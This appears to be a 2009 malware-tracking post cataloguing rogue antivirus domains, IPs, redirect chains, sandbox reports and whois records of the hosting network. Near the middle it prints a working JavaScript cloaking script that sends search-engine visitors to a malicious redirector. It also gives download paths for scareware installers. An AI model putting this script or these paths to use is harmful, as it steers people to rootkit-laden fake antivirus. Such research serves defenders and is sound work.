in4co. com   Wepapet (Redirection) in4sk. com   ThreatExpert goscanit. com     goanyscan. com     gofullscan. com     gofusescan. com     goscanany. com     goscanbay. com     goscanever. com     goscanfull. com March 13   goscanfuse. com     goscanlist.com March 20 new! Wepapet Red.1 - Red.2 goscanmind. com     goscanonly. com     goscanopen. com     goscanslot. com     goscanway. com     goscanwith. com     gotruescan. com     gotscan. com     gowayscan. com     litescan4. com     main4scan.com     mega4scan. com     nowscan4. com     nowscan6. com     scan4any.com March 21 new   scan4data.com March 22 new!   scan4lite.com March 22 new!   scan4home. com     scan4step.com March 20 new!   scanlog4. com     scanmega4. com InternetAntivirusPro ThreatExpert scansafe4. com     scanstep4. com     scantool4. com March 13 VirusTotal - ThreatExpert scanuser4.com     scanzoom4. com     stepscan4. com     true4scan.com March 22 new!   truescan4. com     user4scan. com           lol 78.159.99.52           5goscan. com     best4scan. com     ever4scan. com     gomyscan. com     goscan4. com           194.165.4.20 ThreatExpert         onlinestabilityexamine. com Report         194.165.4.7 ThreatExpert Anubis Other 209.160.20.117               fast-antimalware-scanner. com Report             91.212.65.43       antivirus-xp-pro-2009. com   Report Analysis SetupAntivirusXP.exe               EUROHOST-NET,91.212.65.0,91.212.65.255 91.203.92.181 91.203.92.184         gosafescan. com     live4scan. com     new4scan. com     scan4new. com           194.165.4.140 - AS48669 - NTCOLO-AS NTCOLO     av1scan. com   avscan1. com   avpayments. com   easy6scan. com Analysis fast6scan. com   general-antivirus. com   generalantivirus. com   gomainscan. com [Google Template] goopenscan. com   goproscan. com   goscanbase. com [Redirect to Google with GeoIP] goscanlead. com [Redirect to Google with GeoIP] goscanline. com   goscantrue. com   goscanuser. com   goscansafe. com   gozoomscan. com   ia-pro. com   in1sk. com   internetantiviruspro. com   new4scan. com   scan4new. com   scan4plus. com       194.165.4.41 - AS48669 - NTCOLO-AS NTCOLO       ns1.avscan1. com     ns1.av1scan. com     bestscan4. com     bestscan6. com     best6scan. com Google red. Analysis bestscan6. com Google red. Analysis - Article cokien. com     easy4scan. com     fast4scan. com     fastscan4. com     gobestscan. com     goscantrue. com     just4scan. com     lead4scan. com     live6scan. com     livescan4. com     livescan5. com     livescan6. com     new6scan. com     newscan4. com     newscan6. com     plus4scan. com     plus6scan. com     plusscan4. com     plus6scan. com     plusscan4. com     scan4easy. com     scan4ever. com     scan4fast. com     scan4now. com     scan6best. com     scan6live. com     scanbest4. com     scaneasy4. com     scanfast4. com     scanlive4. com     scanplus4. com     scannew4. com           others (Suspended or not served)     4scanav. com   av4snscan. com   av5scan. com   avscan5. com   basescan4. com   ever6scan. com   everscan4. com   gatescan4. com   gate4scan. com   home4scan. com   in7co. com   new7scan. com   newscan5. com   pro4scan. com   scanav4. com   scanav5. com   scan4line. com   scan4main. com   scan4safe. com   scan6new. com   scan4best. com   scan4log. com   scan4pro. com   scan7live. com   scanline4. com   scanlive4. com   plusscan6. com       Some Redirection:   hxxp://098765. com/in.php hxxp://lastpoher.ru/in.php hxxp://x-more-x.net/in.php hxxp://infidelirium.info/in.php   hxxp://texasvino. com hxxp://87.248.163.58/in.php?s=texasvino. com hxxp://onlinestabilitysite. com/index.php?affid=07105 hxxp://tool4scan. com/26/?uid=12602   (Status-Line): HTTP/1.1 302 Found Date: Fri, 06 Mar 2009 07:43:28 GMT Content-Type: text/html Connection: keep-alive Server: Apache Content-Length: 0 Location: hxxp://87.248.163.58/in.php?s=texasvino. com hxxp://87.248.163.58/in.php?s=texasvino. com (Status-Line): HTTP/1.1 302 Found Date: Fri, 06 Mar 2009 09:41:34 GMT Server: Apache/2.0.55 (Unix) PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: alreadyvisited=0; expires=Fri, 06-Mar-2009 19:41:34 GMT Location: hxxp://onlinestabilitysite. com/hitin.php?land=20&affid=07105 Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html hxxp://onlinestabilitysite. com/hitin.php?land=20&affid=07105 (Status-Line): HTTP/1.1 302 Found Date: Fri, 06 Mar 2009 15:42:24 GMT Server: Apache/2 X-Powered-By: PHP/5.2.8 location: index.php?affid=07105 Content-Length: 0 Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Content-Type: text/html hxxp://onlinestabilitysite. com/index.php?affid=07105 (Status-Line): HTTP/1.1 200 OK Date: Fri, 06 Mar 2009 15:42:25 GMT Server: Apache/2 X-Powered-By: PHP/5.2.8 Keep-Alive: timeout=1, max=99 Connection: Keep-Alive Transfer-Encoding:chunked Content-Type: text/html ***************************** hxxp://87.248.163.58/in.php?s=texasvino. com (Status-Line): HTTP/1.1 302 Found Date: Fri, 06 Mar 2009 09:49:28 GMT Server: Apache/2.0.55 (Unix) PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: alreadyvisited=1; expires=Fri, 06-Mar-2009 19:49:28 GMT Location: hxxp://goscanbay. com/?uid=12602 Content-Length: 0 Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html hxxp://goscanbay. com/?uid=12602 (Status-Line): HTTP/1.1 302 Found Server: nginx/0.6.34 Date: Fri, 06 Mar 2009 07:50:14 GMT Content-Type: text/html Transfer-Encoding:chunked Connection: keep-alive X-Powered-By: PHP/5.2.8 location: hxxp://tool4scan. com/?uid=12602 hxxp://tool4scan. com/26/?uid=12602 ****************************** hxxp://sendsometraff. com/in.php (Status-Line): HTTP/1.1 302 Found Date: Fri, 06 Mar 2009 14:13:37 GMT Server: Apache/2.0.55 (Unix) PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: alreadyvisited=1; expires=Sat, 07-Mar-2009 00:13:37 GMT Location: hxxp://goscanbay. com/?uid=12602 Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html hxxp://goscanbay. com/?uid=12602 (Status-Line): HTTP/1.1 302 Found Server: nginx/0.6.34 Date: Fri, 06 Mar 2009 12:14:22 GMT Content-Type: text/html Transfer-Encoding:chunked Connection: keep-alive X-Powered-By: PHP/5.2.8 location: hxxp://tool4scan. com/?uid=12602 hxxp://tool4scan. com/?uid=12602 ****************************** hxxp://zorroless. com/in.php (Status-Line): HTTP/1.1 302 Found Date: Fri, 06 Mar 2009 14:12:46 GMT Server: Apache/2.0.55 (Unix) PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: alreadyvisited=1; expires=Sat, 07-Mar-2009 00:12:46 GMT Location: hxxp://goscanbay. com/?uid=12602 Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html hxxp://goscanbay. com/?uid=12602 (Status-Line): HTTP/1.1 302 Found Server: nginx/0.6.34 Date: Fri, 06 Mar 2009 12:13:31 GMT Content-Type: text/html Transfer-Encoding:chunked Connection: keep-alive X-Powered-By: PHP/5.2.8 location: http://tool4scan. com/?uid=12602 hxxp://tool4scan. com/?uid=12602 ****************************** hxxp://info4us. info/in.php?v=28 (Status-Line):HTTP/1.1 302 Found Date:Mon, 16 Mar 2009 16:15:16 GMT Server:Apache/1.3.41 (Unix) PHP/5.2.8 X-Powered-By:PHP/5.2.8 Location:http://onlinestabilityworld. com/hitin.php?land=21&affid=16400 Connection:close Transfer-Encoding:chunked Content-Type:text/html hxxp://onlinestabilityworld. com/hitin.php?land=21&affid=16400 hxxp://onlinestabilityworld. com/index.php?c=0&affid=16400 ********************************* 87.248.163.58 hxxp://zorroless. com/in.php hxxp://hola-aloha. net/in.php hxxp://x-more-x. net/in.php hxxp://sendsometraff. com/in.php hxxp://goscanbay. com (78.159.101.27) ........... 202.75.63.116/202.75.63.117 ThreatExpert     u-cleaner. biz   ultimatecleaner. biz Report uprotect. biz Report xprotect. us Report
	More interestingly, a google search fo "Facebook virus" reveal this page: hxxp://2009022118.kuj2doo.bee.pl/facebook_error_check_system.html Script below:   var r = document.referrer; if (r.indexOf("google") != - 1 || r.indexOf("msn") != - 1 || r.indexOf("yahoo") != - 1 || r.indexOf("search") != - 1 || r.indexOf("result") != - 1 || r.indexOf("cache") != - 1 || r.indexOf("translate") != - 1) { document.location = "http://murtinreid. com/in.php?n=1500&s=" + escape(location.hostname) + "&p=" + escape(r).replace(/\+/g, "%2B") } else { document.title = "404 Not Found"; document.write("<h1>Not Found</h1>The requested URL " + location.pathname + " was not found on this server.<p><hr><address>Apache/1.3.39 Server at " + location.hostname + " Port 80</address><div style='display:none'>") }   On Friday, 6 March 8:00 AM - PST hxxp://murtinreid. com/in.php? (87.248.163.58) redirect to same site as onlinedetect. com, 0day33hours. com, allradiohits. com The first time you will be redirect to hxxp://stabilityaudit. com/hitin.php?land=20&affid=07105 (209.44.126.22) and when you return to the same link you will be redirect to another site hxxp://goscanbay. com/?uid=12602 (The redirection - 78.159.101.27) then hxxp://tool4scan. com/?uid=12602 - 78.159.101.27 (or other, depending your country, IP, language etc...) coincidence or related... *** Same redirection: 098765. com/in.php | lastpoher. ru/in.php | x-more-x.net/in.php ahuliard. com | *** The redirection change every day with new domain purchased. Sample below...
Found on March 3: March 5 7 10 13 14 22               gohardscan. com       Analysis     gointoscan. com         Analysis   golistscan. com         Analysis   gomodescan. com       Analysis     goonlyscan. com         Analysis Analysis goplanscan. com         Analysis   goportscan. com         Analysis   goquickscan. com       Analysis     goscanany. com       Analysis     goscanbay. com       Analysis     goscanever. com             goscanfull. com       Analysis     goscanfuse. com             goscanhard. com       Analysis     goscaninto. com             goscanit. com Analysis     Analysis     goscanlist. com             goscanmind. com       Analysis     goscanmode. com       Analysis   Analysis goscanonly. com       Analysis     goscanopen. com     Analysis Analysis     goscanport. com       Analysis     goscanquick. com       Analysis     goscanslot. com       Analysis     goscantrue. com             goscanway. com       Analysis     goscanwith. com       Analysis     goslotscan. com         Analysis   onlinestabilityguide. com         Analysis   onlinestabilitysite. com             onlinestabilityscanada. com             onlinestabilityworld. com         Analysis   scanaonline. com         Analysis   thestabilityscan. com   Analysis         yourstabilityscan. com                           scan4gate. com Analysis from Google   scan4gate. com     scan4user. com Symantec McAfee Site Advisor scan4zoom. com     scan6ever. com     scan6gate. com Redirect to Google   scanever6. com Redirect to Google   scangate4. com Redirect to Google   scangate6. com     scanhome4. com     scanhome6. com           The Google redirection is removed is the HTTP_REFERER match a domain in this list!! You will be redirect to another site like scan4just. com etc... Found on March 6 safetyexamine. com     tool4scan. com     onlinestabilitysite. com           Found on March 7 now4scan. com     scanlead4. com     easywinscanner17. com Continue here   easywinscanner17. com/maldef09_2/4/10108     (78.159.122.156 - 84.16.243.169)           Found on March 8 thestabilityscan. com           Found on March 9 stabilityscandirect. com     scanlog4. com     mega4scan. com McAfee Site Advisor - 2 Google       Found on March 10 goscanopen. com Google Safe Browsing Diagnostic   scan4mega. com Google Safe Browsing Diagnostic         Found on March 11 scan4just. com Google Safe Browsing Diagnostic         Found on March 12   March 13         litescan4. com Analysis   scansafe4. com     scanzoom4. com           Found on March 13 scantool4. com Analysis on March 13   scanvistanow.net Analysis on March 13 Also download file from 94.75.228.147 hosted-by.leaseweb. com stepscan4. com     Reverse IP lookup     Found on March 14 user4scan. com JS Analysis on March 14       MD5: 754d4813959d15ce5863681399b81592         hxxp://user4scan.com/22/?uid=keyin hxxp://user4scan.com/nag/?uid=144&n=nag&install=1 hxxp://user4scan.com/download/install.php hxxp://in4co.com/cki.php?uid=keyin       File: install.exe InternetAntivirusPro.exe file.exe       VirusTotal Analysis VirusTotal VirusTotal Iseclab Anubis Iseclab Anubis Iseclab Anubis ThreatExpert ThreatExpert ThreatExpert       Analysis Report for install.exe | file.exe         Ikarus Virus Scanner: Rootkit.Win32.TDSS (Sig-Id:455680)             HTTP Conversations       hxxp://78.159.101.27:80 - [in4sk. com]         Request: GET /download/file.exe   Response: 200 "OK"   Request: GET /download/file.exe   Response: 206 "Partial Content"   Request: GET /download/InternetAntivirusPro.exe   Response: 200 "OK"   Request: GET /download/InternetAntivirusPro.exe   Response: 206 "Partial Content"   Request: GET /reports/download-report.php?prod_id=9 Response: 200 "OK"         Registry Values Modified         HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Run C:\​Documents and Settings\​user\​Application Data\​Microsoft\​Windows\​winlogon.exe       File Created           C:\Documents and Settings\user\Application Data\Microsoft\Windows\winlogon.exe (Process Activities) c:\program files\Common Files\file.exe c:\program files\Common Files\InternetAntivirusPro.exe c:\program files\Internet Antivirus Pro\ C:\DOCUME~1\user\LOCALS~1\Temp\is-L32VH.tmp C:\DOCUME~1\user\LOCALS~1\Temp\is-L32VH.tmp\InternetAntivirusPro.tmp       Analysis Report for InternetAntivirusPro.exe         FakeAlert-AB [McAfee]   Mal/FakeAV-M [Sophos]         ISSA Journal Rash of Rogue Security Malware pandalabs.pandasecurity.com --- msmvps malwarebytes malwaredatabase ZeuS Tracker abuse.ch Spammer & cybercrime hosting (escalation)   Some malicious activies - ZLKON 94.247.3.213/32 SBL72391 Malware/virus dropper gang 94.247.3.232/32 SBL71685 imp-porntube. net / filesfreedb. com malware codec gang 94.247.2.0/23 SBL70871 zlkon. lv cybercrime spammer hosts 94.247.3.235/32 SBL70870 SECURITYADVIZR. COM etc 94.247.3.10/32 SBL70869 zazerfox. com / ns1.agns. co.cr / etc 94.247.3.9/32 SBL70868 zazerfox. com / ns1.agns. co.cr / etc 94.247.2.0/24 SBL70568 Malware DNS server NS2.MANAGEHOSTDNS .COM 94.247.2.11/32 SBL70308 Malware dropper -fake AV software: antivirus-pro-scanner .com 94.247.2.217/32 SBL70042 Canadian Pharmacy Canadian Pharmacy image host 94.247.2.216/29 SBL70040 Canadian Pharmacy Canadian Pharmacy image hosts   Domain Whois record Queried whois.nic.lv with "zlkon. lv"... domain: zlkon. lv admin-c: 86617-LUMII tech-c: 86617-LUMII nserver: ns1.zlkon.lv nserver: ns2.zlkon.lv changed: dns-reg@nic.lv 20081121 source: LUMII person: <hidden> address: none phone:+371 26330593 e-mail: arkadzi.daniyelian@zlkon. lv nic-hdl: 86617-LUMII source: LUMII Network Whois record Queried whois.ripe.net with "-B 94.247.2.0"... inetnum:94.247.2.0 - 94.247.3.255 netname:ZLKON descr: ZlKon country:LV admin-c:ZK508-RIPE tech-c: DES31-RIPE status: ASSIGNED PA mnt-by: PCEXPRESS-MNT mnt-lower: ZLKON-MNT mnt-routes: ZLKON-MNT changed:igors@pcexpress. lv 20081125 source: RIPE role: ZlKon HostMaster address:Lilijas iela 4-74 address:Riga, LV-1055 address:Latvija phone: +371 26330593 e-mail: hostmaster@zlkon. lv admin-c:AD5952-RIPE tech-c: AD5952-RIPE nic-hdl:ZK508-RIPE mnt-by: ZLKON-MNT changed:hostmaster@zlkon. lv 20081125 source: RIPE abuse-mailbox: abuse@zlkon. lv role: DATORU EXPRESS SERVISS HostMaster address:18. novembra street 319C address:Daugavpils, LV-5413 address:Latvia phone: +371 26631339 fax-no: +371 65420725 remarks:Information: http://www.pcexpress. lv remarks:Questions: hostmaster@pcexpress. lv e-mail: hostmaster@pcexpress. lv admin-c:IV745-RIPE tech-c: IV745-RIPE nic-hdl:DES31-RIPE mnt-by: PCEXPRESS-MNT changed:igors@pcexpress. lv 20081125 source: RIPE abuse-mailbox: abuse@pcexpress. lv % Information related to '94.247.0.0/21AS12553' route: 94.247.0.0/21 descr: "DATORU EXPRESS SERVISS" Ltd. origin: AS12553 mnt-by: PCEXPRESS-MNT changed:igors@pcexpress. lv 20081121 source: RIPE       Link: Google Safe Browsing Diagnostic for an infected domain Youtube video lead to Rogue AntiSpyware - Antivirus360 MalwareDefender2009 - EasyWinScanner17 - FakeSpyGuard Antivirus360 - Crucialsoft ltd ms antispyware 2009 Compromised websites used to spread malware active domains on March 16: goeasyscan.com (Microsoft Template)     goscanbay. com Redirect to ------> scantool4. com litescan4. com go4scan. com Redirect to ------> leadscan6. com (Analysis) goscanfull,com gohardscan. com goscanfull. com goscanhard. com goscanopen. com gomodescan. com goscanmind. com goscanport. com goscanquick. com goscanslot. com goscanway. com goscanwith. com goquickscan. com goscanany. com goscanmode. com gotscan. com On March 11-12-13 Redirect to ------> On March 14 Redirect to ------> On March 16 Redirect to ------> (Analysis) stepscan4. com (Analysis) user4scan. com (Analysis) datascan4. com anyscan4. com       bestfiresfull. com 209.44.126.22 onlinestabilityguide. com 209.44.126.22 onlinestabilityworld. com 209.44.126.22 onlinewebscan. com 94.247.2.215 scanaonline. com   securityscandirect. com housedomainname. cn/in.cgi?6 info4us. info/in.php?v=28 onlinestabilityworld. com vistastabilitynow. com 209.44.126.14 wwwprotectionread. com   webstabilityscan. com 94.247.3.74 wwwsafetyscan. com           March 17 addition: ANYSCAN4.COM     SCANSTEP4.COM     TRUESCAN4.COM                     Today, we change, this is not the go4scan go5scan scan4main scan4 etc..... but a fake porntube site hxxp://zorroless. com/in.php hxxp://hola-aloha. net/in.php hxxp://x-more-x. net/in.php hxxp://sendsometraff. com/in.php Redirect to hxxp://tube-funs-world.com/promo2/?aid=561&vname=free_dvd_rip The site ask me to download free_dvd_rip.exe File size: 2862989 bytes MD5...: f35144147bfd9a7e47e4ae7d79d9b2d1 Result: 4/39 (10.26%) VirusTotal: Permalink ThreatExpert: Permalink RogueAntispyware-sysguard or hxxp://tube-funs-world.com/promo2/2.php?aid=561&vname=stream_player_plugin stream_player_plugin.exe File size: 3159829 bytes MD5...: 5cf2fcaaac2863b850aabd96f85c5ed8 Result: 4/39 (10.26%) VirusTotal: Permalink eSafe [Win32.SPRFraud.PrivC] Sus/Behav-113 [Sophos] Privacy components [Sunbelt] Adware/Agent.gen [TheHacker] Hosted on 78.26.179.34